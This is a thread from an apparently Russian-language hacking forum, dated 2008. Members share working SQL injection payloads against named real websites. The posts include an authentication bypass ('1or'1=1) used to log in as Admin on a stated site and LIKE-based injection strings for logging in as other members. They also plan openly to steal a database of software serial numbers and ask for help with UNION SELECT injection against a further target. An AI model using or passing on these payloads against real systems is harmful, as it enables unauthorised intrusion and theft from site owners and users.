 |
|
10.06.2008, 09:33
|
|
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами:
9593606
Репутация:
4915
|
|
2 sabe
По поводу MSSQL вот статья:
_https://forum.antichat.ru/thread30501.html
Вопрос такой, что в двух словах не объяснишь
|
|
|
10.06.2008, 16:39
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
спс.. будем учится..)
|
|
|
|
10.06.2008, 18:20
|
|
Новичок
Регистрация: 02.12.2007
Сообщений: 7
С нами:
9705945
Репутация:
-28
|
|
Через какой путь можно замутить взлом)?? chat.bobrik.ru/?59
|
|
|
|
10.06.2008, 19:39
|
|
Участник форума
Регистрация: 17.02.2006
Сообщений: 189
С нами:
10646246
Репутация:
34
|
|
http://cyberagesystems.com/member.php
на том сайте
Login: Admin
PAss : '1or'1=1
можно как админом залогинится, только что толку?
|
|
|
|
10.06.2008, 19:47
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
1SeTh, никакого))
Попробуй заходить под другими мемберами. там есть какая-то база серийных номеров к программным продуктам. вот их можно спереть.
|
|
|
|
10.06.2008, 20:28
|
|
Участник форума
Регистрация: 17.02.2006
Сообщений: 189
С нами:
10646246
Репутация:
34
|
|
да ты прав, можно нахляву получить серийники, только мемберов то я незнаю )
еще не понятно тогда как админ редактирует контент?
Последний раз редактировалось 1SeTh; 10.06.2008 в 20:32..
|
|
|
|
10.06.2008, 22:07
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
1SeTh, прописать в логин и пароль что-то типа
-99' or email like '%sergey%' /* -99 для того чтобы этой записи в бд точно не было, тогда сработает конструкция or
pass'/*
за место sergey подбираем слово, которое может входить в мыло.
|
|
|
|
10.06.2008, 22:28
|
|
Участник форума
Регистрация: 17.02.2006
Сообщений: 189
С нами:
10646246
Репутация:
34
|
|
Сообщение от AFoST
1SeTh, прописать в логин и пароль что-то типа
-99' or email like '%sergey%' /* -99 для того чтобы этой записи в бд точно не было, тогда сработает конструкция or
pass'/*
за место sergey подбираем слово, которое может входить в мыло.
я пробовал как ты сказал, как бы ни крутил только под логином админа заходишь.
вместо слово сергей поставил пару американских имен все равно заходить под логином Admin 
|
|
|
|
10.06.2008, 23:14
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
1SeTh, я зашел под другим логином 
вбиваем
pizda' or password like '%9%'/*
pizda' or password like '%9%'/*
входим под grease2
=)))) |
|
|
|
10.06.2008, 23:33
|
|
Познающий
Регистрация: 23.05.2008
Сообщений: 84
С нами:
9456679
Репутация:
97
|
|
Ребят, прошу помощи.Через order by подобрал поля. Пытаюсь вывести через
index.php?ID=-19+UNION+SELECT+1,2,3/* -т.е. при неверном id, редиректит на др. страницу another.html
При запросе ID=19+UNION+SELECT+1,2,3/* не выводит ошибок, но и выводимых полей нет, id то верный.
Как можно обойти?
И вообще не первый раз встречаюсь с ситуацией,id=1593+order+by+12/* ошибка,id=1593+order+by+8/* нет ошибки,id=-1593+order+by+8/* редирект.Why?
Последний раз редактировалось Imperou$; 10.06.2008 в 23:41..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
